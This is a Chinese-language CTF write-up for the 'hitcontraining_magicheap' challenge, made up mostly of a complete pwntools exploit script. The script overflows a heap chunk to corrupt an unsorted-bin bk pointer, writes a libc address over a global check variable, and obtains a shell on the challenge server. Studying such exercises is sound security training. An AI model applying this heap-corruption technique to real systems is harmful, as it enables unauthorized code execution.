hitcontraining_magicheap
查看保护
l33t 功能(菜单输入 4869)会检查全局变量 magic:magic > 0x1305 即可 getshell。下面的脚本通过 unsorted bin attack 把一个 libc 地址写进 magic,远大于 0x1305,所以能通过检查。
edit 的时候没有检查新的 size 是否超过原来分配的大小,可以堆溢出;程序没有 PIE,magic 的地址固定,直接打 unsorted bin attack 即可。具体的 attack 原理看我的 blog。
from pwn import *
# pwntools setup: 64-bit Linux target, verbose tube logging so every
# send/recv is visible while the exploit is being tuned.
context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

# NOTE: the flag name is inverted relative to convention -- debug=1 talks to
# the remote challenge instance, debug=0 spawns the local binary (the only
# mode in which dbg()/gdb.attach can work).
debug = 1
r = remote('node4.buuoj.cn', 28199) if debug else process(file_name)

# Local copy of the binary, loaded for symbol/section lookups.
elf = ELF(file_name)
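def dbg():
    """Attach gdb to the local target for interactive debugging.

    gdb can only attach to a local ``process``; when ``debug`` selects the
    remote target this is a no-op with a warning instead of an exception.
    The ``pause()`` after attaching gives you time to set breakpoints before
    the exploit continues sending input.
    """
    if debug:
        # debug=1 means the remote instance is in use (see the setup above).
        log.warning('dbg(): target is remote, cannot attach gdb')
        return
    gdb.attach(r)
    pause()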
# Prompt printed before every menu read; all helpers below sync on it.
menu = 'Your choice :'
def add(size, content):
    """Menu option 1: allocate a heap chunk of ``size`` bytes holding ``content``.

    Each prompt/answer pair is sent in menu order; the binary reads the size
    first and the content second.
    """
    dialogue = (
        (menu, '1'),
        ('Size of Heap : ', str(size)),
        ('Content of heap:', content),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def edit(index, size, content):
    """Menu option 2: overwrite chunk ``index`` with ``size`` bytes of ``content``.

    ``size`` is the length the binary reads, not the chunk's allocated size --
    the program never checks it against the original allocation, which is the
    heap overflow this exploit relies on. Note the edit prompt differs from the
    create prompt ('Content of heap : ' vs 'Content of heap:'); both are the
    binary's exact strings.
    """
    dialogue = (
        (menu, '2'),
        ('Index :', str(index)),
        ('Size of Heap : ', str(size)),
        ('Content of heap : ', content),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def delete(index):
    """Menu option 3: free the chunk at ``index``."""
    dialogue = (
        (menu, '3'),
        ('Index :', str(index)),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
# --- exploit: unsorted bin attack on the global `magic` ---
#
# Heap layout: [0] small chunk used as the overflow source, [1] the victim
# whose header we corrupt, [2] a guard so that freeing [1] does not merge it
# into the top chunk. A 0x80 request gives a 0x90 chunk, which is above the
# default fastbin limit, so on free it lands in the unsorted bin.
# NOTE(review): this assumes a glibc without tcache and without the
# `bck->fd != victim` unsorted-bin check (i.e. older than 2.26/2.28) --
# confirm against the challenge's libc.
victim_size = 0x80
add(0x10, 'aaaa')          # index 0
add(victim_size, 'bbbb')   # index 1 (victim)
add(0x10, 'cccc')          # index 2 (guard)
delete(1)                  # chunk 1 -> unsorted bin

# Address of the global `magic`; fixed because the binary has no PIE.
# (If the binary is unstripped, elf.symbols['magic'] should give the same value.)
magic = 0x6020A0

# Overflow from chunk 0's data into chunk 1's header. 0x18 bytes of filler
# cover chunk 0's 0x10 user bytes plus the prev_size field of chunk 1, then:
#   size = 0x91   (0x90 | PREV_INUSE, unchanged so malloc accepts the chunk)
#   fd   = 0      (not dereferenced when the chunk is taken from the bin)
#   bk   = magic - 0x10
# When malloc unlinks chunk 1 from the unsorted bin it does
# bck->fd = unsorted_chunks(av), i.e. writes a libc pointer to
# (magic - 0x10) + 0x10 == magic -- a value far above the 0x1305 threshold.
fake_fd = 0
fake_bk = magic - 0x10
p1 = b''.join([b'a' * 0x18, p64(0x91), p64(fake_fd), p64(fake_bk)])
edit(0, len(p1), p1)

# Same size class as the victim: malloc takes chunk 1 straight from the
# unsorted bin and performs the corrupted unlink above.
add(victim_size, 'aaaa')

# l33t option: checks magic > 0x1305 and hands out the shell/flag.
r.sendlineafter(menu, '4869')
r.interactive()